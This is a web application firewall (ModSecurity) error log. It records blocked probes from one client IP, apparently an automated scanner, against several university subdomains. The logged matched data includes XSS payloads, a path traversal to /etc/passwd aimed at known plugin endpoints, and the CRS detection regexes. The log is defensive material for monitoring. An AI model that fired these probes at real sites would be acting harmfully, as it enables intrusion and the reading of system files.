[Tue Aug 29 11:56:07.696735 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:title_az. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:title_az: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/title_az.php"] [unique_id "ZO16Z8Co-f0AAArC7fkAAAAW"]
[Tue Aug 29 11:56:07.699111 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:title_az. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:title_az: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/title_az.php"] [unique_id "ZO16Z8Co-f0AAAq@sf8AAAAM"]
[Tue Aug 29 11:56:07.706648 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16Z8Co-f0AAAq5@McAAAAK"]
[Tue Aug 29 11:56:08.546661 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/content/jw_allvideos/includes/download.php"] [unique_id "ZO16aMCo-f0AAAq@sgEAAAAM"]
[Tue Aug 29 11:56:08.548609 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/plugins/content/jw_allvideos/includes/download.php"] [unique_id "ZO16aMCo-f0AAApa-TgAAAAg"]
[Tue Aug 29 11:56:08.551301 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/plugins/content/jw_allvideos/includes/download.php"] [unique_id "ZO16aMCo-f0AAArC7fsAAAAW"]
[Tue Aug 29 11:56:08.552059 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/plugins/content/jw_allvideos/includes/download.php"] [unique_id "ZO16aMCo-f0AAApbUvwAAAAh"]
[Tue Aug 29 11:56:08.578987 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:count: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/goform/activate_process"] [unique_id "ZO16aMCo-f0AAApbUv0AAAAh"]
[Tue Aug 29 11:56:08.646664 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:count: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/goform/activate_process"] [unique_id "ZO16aMCo-f0AAAq@sgYAAAAM"]
[Tue Aug 29 11:56:08.649650 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16aMCo-f0AAArB1xMAAAAV"]
[Tue Aug 29 11:56:08.668794 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:count: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/goform/activate_process"] [unique_id "ZO16aMCo-f0AAAqY6RoAAAAr"]
[Tue Aug 29 11:56:08.679855 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:count: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/goform/activate_process"] [unique_id "ZO16aMCo-f0AAArB1xQAAAAV"]
[Tue Aug 29 11:56:08.699677 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:count: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/goform/activate_process"] [unique_id "ZO16aMCo-f0AAArB1xUAAAAV"]
[Tue Aug 29 11:56:08.712980 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/plugins/content/jw_allvideos/includes/download.php"] [unique_id "ZO16aMCo-f0AAAqY6RwAAAAr"]
[Tue Aug 29 11:56:09.679375 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/plugins/content/jw_allvideos/includes/download.php"] [unique_id "ZO16acCo-f0AAAqTv2gAAAAa"]
[Tue Aug 29 11:56:09.681569 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:count: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/goform/activate_process"] [unique_id "ZO16acCo-f0AAAq@sgsAAAAM"]
[Tue Aug 29 11:56:10.543876 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wp-symposium/get_album_item.php"] [unique_id "ZO16asCo-f0AAAqTv2sAAAAa"]
[Tue Aug 29 11:56:10.563008 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:backurl: 1 onmouseover=alert(/document.domain/) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/plugins/template/login.php"] [unique_id "ZO16asCo-f0AAApa-UEAAAAg"]
[Tue Aug 29 11:56:10.563131 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 1 onmouseover= found within ARGS:backurl: 1 onmouseover=alert(/document.domain/) y="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/plugins/template/login.php"] [unique_id "ZO16asCo-f0AAApbUw4AAAAh"]
[Tue Aug 29 11:56:10.566479 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 1 onmouseover= found within ARGS:backurl: 1 onmouseover=alert(/document.domain/) y="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/plugins/template/login.php"] [unique_id "ZO16asCo-f0AAAq5@NEAAAAK"]
[Tue Aug 29 11:56:10.568168 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 1 onmouseover= found within ARGS:backurl: 1 onmouseover=alert(/document.domain/) y="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/plugins/template/login.php"] [unique_id "ZO16asCo-f0AAApXgscAAAAU"]
[Tue Aug 29 11:56:10.603121 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wp-symposium/get_album_item.php"] [unique_id "ZO16asCo-f0AAAqeFkIAAAAx"]
[Tue Aug 29 11:56:10.604433 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wp-symposium/get_album_item.php"] [unique_id "ZO16asCo-f0AAAq@shAAAAAM"]
[Tue Aug 29 11:56:10.651853 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:backurl: 1 onmouseover=alert(/document.domain/) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/template/login.php"] [unique_id "ZO16asCo-f0AAApbUxAAAAAh"]
[Tue Aug 29 11:56:10.671999 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wp-symposium/get_album_item.php"] [unique_id "ZO16asCo-f0AAApbUxEAAAAh"]
[Tue Aug 29 11:56:10.681483 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wp-symposium/get_album_item.php"] [unique_id "ZO16asCo-f0AAAqTv28AAAAa"]
